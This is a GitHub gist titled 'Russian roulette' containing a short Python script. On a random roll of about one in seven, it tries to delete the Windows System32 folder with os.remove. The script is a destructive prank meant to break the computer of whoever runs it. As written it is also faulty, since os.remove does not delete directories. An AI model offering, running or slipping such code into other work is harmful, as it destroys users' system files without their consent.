Skip to content

Instantly share code, notes, and snippets.

@henriquesebastiao
Created January 27, 2024 20:04
Show Gist options
  • Save henriquesebastiao/e7c100c27eadb55d3c78ec86d9572441 to your computer and use it in GitHub Desktop.
Save henriquesebastiao/e7c100c27eadb55d3c78ec86d9572441 to your computer and use it in GitHub Desktop.
Russian roulette
import random
import os
if random.randint(0, 6) == 1:
os.remove(r'C:\Windows\System32')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment